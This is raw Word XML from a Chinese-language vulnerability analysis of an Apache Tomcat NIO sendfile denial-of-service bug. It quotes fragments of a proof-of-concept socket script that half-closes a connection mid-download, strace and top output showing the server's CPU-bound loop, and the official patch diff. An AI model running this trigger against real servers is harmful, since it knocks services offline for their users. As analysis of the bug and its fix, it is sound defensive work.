          <w:t>https://issues.apache.org/bugzilla/show_bug.cgi?id=52858</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上给出的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sendfile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NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器时，若客户端请求较大的静态文件，并</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在读取响应的过程中终止与服务器的连接，会在服务器端产生死循环，导致拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并结合官方补丁来进行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF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POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中请求文件大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节后并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了连接，使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入半连接状态，从而造成了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr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F23FF0" w:rsidTr="00542A27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>sslSocket.send(getCssRequest)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>data = sslSocket.recv(1024)</w:t>
            </w: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1024</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字节</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>''' Put the socket into half - closed state '''</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>clientSocket.shutdown(SHUT_WR)</w:t>
            </w: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关闭使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进入半连接状态</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRPr="00DD48B6" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>clientSocket.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟踪运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后的系统调用情况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F23FF0" w:rsidTr="00542A27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F23FF0" w:rsidRPr="004335F1" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r w:rsidRPr="004F2705">
              <w:t>sudo strace -f -o strace3101 -p 3101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> //3101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运行进程号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截取如下信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23F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F23FF0" w:rsidTr="00542A27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  write(61, "\\\240\274M\302J\313\33b\323\242\301_\264\33P\232\336\302\271\235\356\215j\3772\340\272\t\303\33\302"..., 3500) = -1 EAGAIN (Resource temporarily unavailable)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289444}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289467}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  write(60, "\352\222\256\32\255\336\24\25\330}\375U;j\234\327\335\2720\203\366\221\363(\345X\36\324V\310\36O"..., 3500) = -1 EAGAIN (Resource temporarily unavailable)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289525}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289548}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  write(62, "\257\231\207X.\256\344`\\\327n\300\25{\353\357\350\203\262\363C\335\311\24\373j\225\2\4|s\376"..., 3500) = -1 EAGAIN (Resource temporarily unavailable)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289606}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289629}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  write(56, "\373\324X+\7\2iM\370\373\240\306\17\217F\277\242\t*\337\204\21G\311\24\213\214N4\3073E"..., 3500) = -1 EAGAIN (Resource temporarily unavailable)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289687}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289711}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  epoll_wait(55, {{EPOLLIN, {u32=61, u64=13024703502981529661}}, {EPOLLIN, {u32=56, u64=56}}, {EPOLLIN, {u32=60, u64=60}}, {EPOLLIN, {u32=63, u64=63}}, {EPOLLIN, {u32=59, u64=59}}, {EPOLLIN, {u32=62, u64=13024703434262052926}}}, 4096, 1000) = 6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289771}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289794}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  write(63, "\227\5\242\22\300\231\307\376\242p\253n\256G\7_\36,\323\223\306=J\221xc\33\207+\227\204e"..., 3500) = -1 EAGAIN (Resource temporarily unavailable)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289852}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289875}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  write(59, "\366\364\362*\374H\217\247\33\17\243_-\354I\365'5\365\266\223\261\"\326\251e\265\370{\0163B"..., 3500) = -1 EAGAIN (Resource temporarily unavailable)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289937}, NULL) = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>3121  gettimeofday({1354886731, 289959}, NULL) = 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据系统调用信息可以知道会有因为把</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据往</w:t>
      </w:r>
      <w:r w:rsidRPr="00130A9C">
        <w:t>socket descriptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EAGAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败，然后又继续去请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EPOLLIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，又尝试写，又</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EAGAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，持续轮询，导致拒绝服务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F23FF0" w:rsidTr="00542A27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND            </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRPr="00EF47FE" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve"> 2723 root      20   0  411m  40m  10m S </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">97.3  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">8.2   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:t>0:39.17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">java  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方补丁是如下修改方式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F23FF0" w:rsidTr="00542A27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>--- tomcat/tc7.0.x/trunk/java/org/apache/tomcat/util/net/NioEndpoint.java</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>2012/05/18 19:27:41</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>1340217</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+++ tomcat/tc7.0.x/trunk/java/org/apache/tomcat/util/net/NioEndpoint.java</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>2012/05/18 19:28:30</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>1340218</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>@@ -1278,9 +1278,13 @@</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">         public boolean processSendfile(SelectionKey sk, KeyAttachment attachment, boolean reg, boolean event) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">             NioChannel sc = null;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+            if (log.isTraceEnabled()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+                log.trace("["+new java.sql.Date(System.currentTimeMillis()).toGMTString()+"] Processing send file. ["+sk+"] ");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+            }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">             try {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 unreg(sk, attachment, sk.readyOps());</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 SendfileData sd = attachment.getSendfileData();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+                //setup the file channel</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 if ( sd.fchannel == null ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     File f = new File(sd.fileName);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     if ( !f.exists() ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>@@ -1289,10 +1293,14 @@</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     sd.fchannel = new FileInputStream(f).getChannel();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+                //configure output channel</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 sc = attachment.getChannel();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 sc.setSendFile(true);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+                //ssl channel is slightly different</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 WritableByteChannel wc = ((sc instanceof SecureNioChannel)?sc:sc.getIOChannel());</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+                //we still have data in the buffer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                 if (sc.getOutboundRemaining()&gt;0) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     if (sc.flushOutbound()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                         attachment.access();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>@@ -1322,7 +1330,6 @@</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     } catch (Exception ignore) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     if ( sd.keepAlive ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>-                        if (reg) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                             if (log.isDebugEnabled()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                                 log.debug("Connection is keep alive, registering back for OP_READ");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                             }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>@@ -1331,7 +1338,6 @@</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                             } else {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                                 reg(sk,attachment,SelectionKey.OP_READ);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                             }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>-                        }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     } else {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                         if (log.isDebugEnabled()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                             log.debug("Send file connection is being closed");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>@@ -1339,7 +1345,7 @@</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                         cancelledKey(sk,SocketStatus.STOP,false);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                         return false;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>-                } else if ( attachment.interestOps() == 0 &amp;&amp; reg ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t>+                } else { //if ( attachment.interestOps() == 0 &amp;&amp; reg ) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                     if (log.isDebugEnabled()) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
              <w:t xml:space="preserve">                         log.debug("OP_WRITE for sendilfe:"+sd.fileName);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:r>
